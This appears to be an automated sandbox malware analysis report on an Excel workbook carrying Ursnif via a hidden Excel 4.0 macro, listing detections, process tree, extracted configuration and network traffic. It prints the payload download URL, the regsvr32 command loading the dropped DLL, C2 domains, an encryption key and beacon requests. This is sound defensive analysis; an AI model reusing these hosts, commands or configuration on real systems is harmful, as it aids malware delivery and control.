Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report my_attach_82862.xlsb

Overview

General Information

Sample Name:my_attach_82862.xlsb
Analysis ID:433009
MD5:1f155a8f8c53066ef9dba8520cbcf346
SHA1:75dda503a5f1bbb11c8de9236ff237a7989e8e80
SHA256:29b13fa315a5249d1654221cf944f097ac4b0c42a133d07365cd3cc6afdd1a10
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0 Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Found malware configuration
Multi AV Scanner detection for domain / URL
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
System process connects to network (likely due to code injection or exploit)
Yara detected Ursnif
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found abnormal large hidden Excel 4.0 Macro sheet
Office process drops PE file
Potential thread-based time evasion detected
Sigma detected: Microsoft Office Product Spawning Windows Shell
Writes or reads registry keys via WMI
Writes registry values via WMI
Abnormal high CPU Usage
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the installation date of Windows
Registers a DLL
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Yara detected Xls With Macro 4.0

Classification

Process Tree

  • System is w10x64
  • EXCEL.EXE (PID: 5988 cmdline: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
    • regsvr32.exe (PID: 6180 cmdline: regsvr32 -s C:/Users/Public/SettingSyncY.dll MD5: 426E7499F6A7346F0410DEAD0805586B)
  • iexplore.exe (PID: 6412 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 6436 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6412 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 5448 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 5724 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5448 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 5308 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 5516 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5308 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • iexplore.exe (PID: 6200 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 6012 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6200 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"lang_id": "RU, CN", "RSA Public Key": "oUnY8+/8G/QjijBEa03/PDDCyhbZrtKtx8eYSXLSbmKpR2omzPKPDVDiaj+dBCVC5Sp5s16D5EsjkO+S9MLdqEPK+/EAZI0qxYwv0GmWkXSlJi4jyYyJKc5a5Nek5/cWbmHSXPW+Rq2S8QAD5SioqB8j4ScC8nSuqcxPZwTdEUXuTG36kAdjIfamPdH5DlrmzxdodFTkShIE2IKM5O/dCTIwhTSQIj7YF2w9akzONLDoXT8cJE2CEp0UrlGkTtCcRTWQr67rMF2nSqm+ctweTZRfgBKtrDgiEDrXnhmUscy59twRBz1A7dRDpJryotUEkXjZHrb6gv4q0NjsbeCK4Jw4zYJf7CO+eANF3Bou0fo=", "c2_domain": ["authd.feronok.com", "app.bighomegl.at"], "botnet": "1500", "server": "580", "serpent_key": "jT7xNsiVSW2IugIq", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "10"}

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
app.xmlJoeSecurity_XlsWithMacro4Yara detected Xls With Macro 4.0Joe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000003.00000003.326306030.0000000005958000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000003.00000003.326271156.0000000005958000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000003.00000003.326446921.0000000005958000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          00000003.00000003.326414458.0000000005958000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            00000003.00000003.326370042.0000000005958000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
              Click to see the 5 entries

              Sigma Overview

              System Summary:

              barindex
              Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
              Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: regsvr32 -s C:/Users/Public/SettingSyncY.dll, CommandLine: regsvr32 -s C:/Users/Public/SettingSyncY.dll, CommandLine|base64offset|contains: ,, Image: C:\Windows\SysWOW64\regsvr32.exe, NewProcessName: C:\Windows\SysWOW64\regsvr32.exe, OriginalFileName: C:\Windows\SysWOW64\regsvr32.exe, ParentCommandLine: 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE, ParentProcessId: 5988, ProcessCommandLine: regsvr32 -s C:/Users/Public/SettingSyncY.dll, ProcessId: 6180

              Signature Overview

              Click to jump to signature section

              Show All Signature Results

              AV Detection:

              barindex
              Antivirus detection for URL or domainShow sources
              Source: https://quickbooks.aeymotors.com/soft.dllAvira URL Cloud: Label: malware
              Found malware configurationShow sources
              Source: 00000003.00000003.285300360.0000000003010000.00000040.00000001.sdmpMalware Configuration Extractor: Ursnif {"lang_id": "RU, CN", "RSA Public Key": "oUnY8+/8G/QjijBEa03/PDDCyhbZrtKtx8eYSXLSbmKpR2omzPKPDVDiaj+dBCVC5Sp5s16D5EsjkO+S9MLdqEPK+/EAZI0qxYwv0GmWkXSlJi4jyYyJKc5a5Nek5/cWbmHSXPW+Rq2S8QAD5SioqB8j4ScC8nSuqcxPZwTdEUXuTG36kAdjIfamPdH5DlrmzxdodFTkShIE2IKM5O/dCTIwhTSQIj7YF2w9akzONLDoXT8cJE2CEp0UrlGkTtCcRTWQr67rMF2nSqm+ctweTZRfgBKtrDgiEDrXnhmUscy59twRBz1A7dRDpJryotUEkXjZHrb6gv4q0NjsbeCK4Jw4zYJf7CO+eANF3Bou0fo=", "c2_domain": ["authd.feronok.com", "app.bighomegl.at"], "botnet": "1500", "server": "580", "serpent_key": "jT7xNsiVSW2IugIq", "sleep_time": "10", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "10"}
              Multi AV Scanner detection for domain / URLShow sources
              Source: authd.feronok.comVirustotal: Detection: 11%Perma Link
              Source: app.bighomegl.atVirustotal: Detection: 6%Perma Link
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
              Source: unknownHTTPS traffic detected: 50.87.220.158:443 -> 192.168.2.3:49714 version: TLS 1.2
              Source: Binary string: c:\571\bar\Nature\industry\Son.pdb source: regsvr32.exe, soft[1].dll.0.dr

              Software Vulnerabilities:

              barindex
              Document exploit detected (creates forbidden files)Show sources
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\soft[1].dllJump to behavior
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\Public\SettingSyncY.dllJump to behavior
              Document exploit detected (drops PE files)Show sources
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: soft[1].dll.0.drJump to dropped file
              Document exploit detected (UrlDownloadToFile)Show sources
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXESection loaded: unknown origin: URLDownloadToFileA
              Document exploit detected (process start blacklist hit)Show sources
              Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\regsvr32.exe
              Source: Joe Sandbox ViewASN Name: SUPERSERVERSDATACENTERRU SUPERSERVERSDATACENTERRU
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: global trafficHTTP traffic detected: GET /j0D4WkqJA4qbSI2s/tbqllkJ5QjS02c9/Y4oADFKhbig2E3MZ8L/S5BHZDPll/SOOSmvbSSzszfQOGO_2F/ebssg7ZOH9iTiK1egYa/TYvtl48FqSo7aXNnyk8zDn/0M4_2F1RU9EXO/TpeNu_2B/RPWPT_2BSfoiOaYRvUkNxcz/WR4a1P2fCQ/k1EnQMOdYbM0XsiH2/reukwmEF53hW/xa5HBUgFOAx/sGDiJ22uuBIopz/tZj9wmd1r7z3ANuAYbfIk/bhnJIJVnJvAXbS6_/2Fsif8yHgRIg6fa/a0BPP1Z_2FHpWsn1gk/fe5cFcowW/IKK9U HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: authd.feronok.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /c0Zjvpk_/2BhHkEQKFoUb3aKx_2FuhQ9/zz1UpsMDGJ/MqFrowSgYmc2fzVA2/yf5xhKlVBQKb/rwrgpqZOvNV/mxBLQ1oxc7jv8k/5tQFefyNUnYTHJj33dQKu/YqZyqYfZuaOHFPro/3D3_2B6kK9arKKX/Wf1dZBj8QqS_2BWWVF/B7Ahpx3M5/Q3B93_2FcSTrCmxypMPT/8JVp8AUZzhfuucVY_2B/wCiIRjjYq_2FqoNLK9B6bf/0aSehXg9FwafT/cgt8pMOQ/HbDCojQOV1FVprYRnxx13U1/UwN8_2B_2F/vzILJE71SBej4gvGi/FIWIlMn9n/L3 HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: authd.feronok.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /8N_2FW41xDzjkhrWQ/7Li83vNh8E0s/iNweknKPsr4/wqFKfz34i2ath6/I0bXROB0tUnNMBxp8qE25/AmJwK10jn6MVat3G/t7FuQx2zVw1ffa5/c7cpkHpQnz9kmDbUqx/Otf3v0Da9/dQZioOeK9Dz9hNXsqwu1/tlEzuHEM4S9kJrg9zGq/RjBYXn9MjpOQGxui0wmfPX/po6OMlacqL3xm/d_2FBFj8/AujuAR6DuH05PJMkT_2BTvZ/D_2BlXEdZ3/ZBW_2FuilrCeiWMje/rHsDq9syNU01/kSBqmc5Fyr_/2B3baeMNkKHxqo/p7TsHB_2FsB3Yjr2vV_2F/OiBfbqWQAEP/P_2F HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: app.bighomegl.atConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /Nqnk1j8Pq1gJEs1x5F/Dd1hhfQAv/jtmHiVvgoBkcYEwLzLyA/C5p24Ce9YgRZRzxsjjD/nxl_2BdpzYbVr0QWXmBP9v/GO1k2SCoSQjXR/yxhwTnmC/pDIJ9c_2Bm_2FrJ_2B9wee3/JVSl6ysora/rGjwo8YPYfbP9mT94/HzBvhbCiqM7B/Bi1eHCPiGVL/46J0oLxANcfziq/thqSh_2Bozif3G_2Fo_2F/k6b3HZTG7RK0p_2F/ovJUD_2BB3IEisf/V1SwB6D9ZycfRmjdXo/1wtqe3ptL/omd3M4svRRs8_2F1Zp8h/fMxrdwrQxKRQQ81i3US/ttoCJ HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: authd.feronok.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /1KWgQnO99/jRkbuys9zmBRLf_2Bfsk/j4hnRgNwvnusz6igqqU/69TUSClHMklgWWKD_2F1Zz/rzeT_2BYOFVhf/cyHjXUJp/RmO3IoI8my48PUoCkU_2Bq5/Szeo_2BZSo/JGYOsrFv3PDanQVBJ/aQVxlvGnm7ma/EvG_2Fcbphd/B7D_2FsJViKTei/G4P6ADPlZ3kryG2o13jPZ/lht8TN_2BF0SOOm1/wlXy9yuuvEg2t5t/0qJz6tISKUfXu3ooK_/2B_2FN_2B/Y8QRyMSJiCCXzc8ct_2F/cWxPiUkWHFklqYWaKgD/HT4v_2FZjRB5pDpaTPvsKl/vHhtteYEDrQEo/F_2BGZVP/fKC323Rf/6 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)Host: app.bighomegl.at
              Source: msapplication.xml0.20.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x6fbcfddf,0x01d75eba</date><accdate>0x6fbcfddf,0x01d75eba</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
              Source: msapplication.xml0.20.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0x6fbcfddf,0x01d75eba</date><accdate>0x6fbcfddf,0x01d75eba</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
              Source: msapplication.xml5.20.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x6fc424e9,0x01d75eba</date><accdate>0x6fc424e9,0x01d75eba</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
              Source: msapplication.xml5.20.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0x6fc424e9,0x01d75eba</date><accdate>0x6fc424e9,0x01d75eba</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
              Source: msapplication.xml7.20.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x6fc424e9,0x01d75eba</date><accdate>0x6fc424e9,0x01d75eba</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
              Source: msapplication.xml7.20.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0x6fc424e9,0x01d75eba</date><accdate>0x6fc424e9,0x01d75eba</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
              Source: unknownDNS traffic detected: queries for: quickbooks.aeymotors.com
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Fri, 11 Jun 2021 03:07:35 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
              Source: {C1F50A29-CAAD-11EB-90E4-ECF4BB862DED}.dat.34.drString found in binary or memory: http://app.bighomegl.at/8N_2FW41xDzjkhrWQ/7Li83vNh8E0s/iNweknKPsr4/wqFKfz34i2ath6/I0bXROB0tUnNMBxp8q
              Source: ~DF60CBFC830128400E.TMP.36.dr, {CFEFB1DE-CAAD-11EB-90E4-ECF4BB862DED}.dat.36.drString found in binary or memory: http://authd.feronok.com/Nqnk1j8Pq1gJEs1x5F/Dd1hhfQAv/jtmHiVvgoBkcYEwLzLyA/C5p24Ce9YgRZRzxsjjD/nxl_2
              Source: {B403EC44-CAAD-11EB-90E4-ECF4BB862DED}.dat.29.drString found in binary or memory: http://authd.feronok.com/c0Zjvpk_/2BhHkEQKFoUb3aKx_2FuhQ9/zz1UpsMDGJ/MqFrowSgYmc2fzVA2/yf5xhKlVBQKb/
              Source: {99BBC3ED-CAAD-11EB-90E4-ECF4BB862DED}.dat.20.drString found in binary or memory: http://authd.feronok.com/j0D4WkqJA4qbSI2s/tbqllkJ5QjS02c9/Y4oADFKhbig2E3MZ8L/S5BHZDPll/SOOSmvbSSzszf
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
              Source: msapplication.xml.20.drString found in binary or memory: http://www.amazon.com/
              Source: msapplication.xml1.20.drString found in binary or memory: http://www.google.com/
              Source: msapplication.xml2.20.drString found in binary or memory: http://www.live.com/
              Source: msapplication.xml3.20.drString found in binary or memory: http://www.nytimes.com/
              Source: msapplication.xml4.20.drString found in binary or memory: http://www.reddit.com/
              Source: msapplication.xml5.20.drString found in binary or memory: http://www.twitter.com/
              Source: msapplication.xml6.20.drString found in binary or memory: http://www.wikipedia.com/
              Source: msapplication.xml7.20.drString found in binary or memory: http://www.youtube.com/
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://analysis.windows.net/powerbi/api
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://api.aadrm.com/
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://api.addins.store.office.com/app/query
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://api.cortana.ai
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://api.diagnostics.office.com
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://api.diagnosticssdf.office.com
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://api.microsoftstream.com/api/
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://api.office.net
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://api.onedrive.com
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/groups
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://apis.live.net/v5.0/
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://arc.msn.com/v4/api/selection
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://asgsmsproxyapi.azurewebsites.net/
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://augloop.office.com
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://augloop.office.com/v2
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://autodiscover-s.outlook.com/
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://cdn.entity.
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/stat/images/OneDriveUpsell.png
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSignUpUpsell
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://cdn.odc.officeapps.live.com/odc/xml?resource=OneDriveSyncClientUpsell
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://client-office365-tas.msedge.net/ab
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://clients.config.office.net/
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/android/policies
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/ios
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/mac
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://clients.config.office.net/user/v1.0/tenantassociationkey
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://cloudfiles.onenote.com/upload.aspx
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://config.edge.skype.com
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://config.edge.skype.com/config/v1/Office
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://config.edge.skype.com/config/v2/Office
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://cortana.ai
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://cortana.ai/api
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://cr.office.com
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://dataservice.o365filtering.com
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://dataservice.o365filtering.com/
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://dev.cortana.ai
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://dev0-api.acompli.net/autodetect
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://devnull.onenote.com
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://directory.services.
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://ecs.office.com/config/v2/Office
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://entitlement.diagnostics.office.com
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://entitlement.diagnosticssdf.office.com
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://excel.uservoice.com/forums/304936-excel-for-mobile-devices-tablets-phones-android
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://globaldisco.crm.dynamics.com
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://graph.ppe.windows.net
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://graph.ppe.windows.net/
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://graph.windows.net
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://graph.windows.net/
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/api/telemetry
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/browse?cp=remix3d
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=icons&amp;premium=1
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockimages&amp;premium=1
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsoftcontent?initpivot=stockvideos&amp;premium=1
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://hubblecontent.osi.office.net/contentsvc/microsofticon?
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://incidents.diagnostics.office.com
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://incidents.diagnosticssdf.office.com
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=Immersive
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Bing
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=ClipArt
              Source: D18DB67F-C32A-4E79-9062-0C1A4F78D8FB.0.drString found in binary or memory: https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Facebook
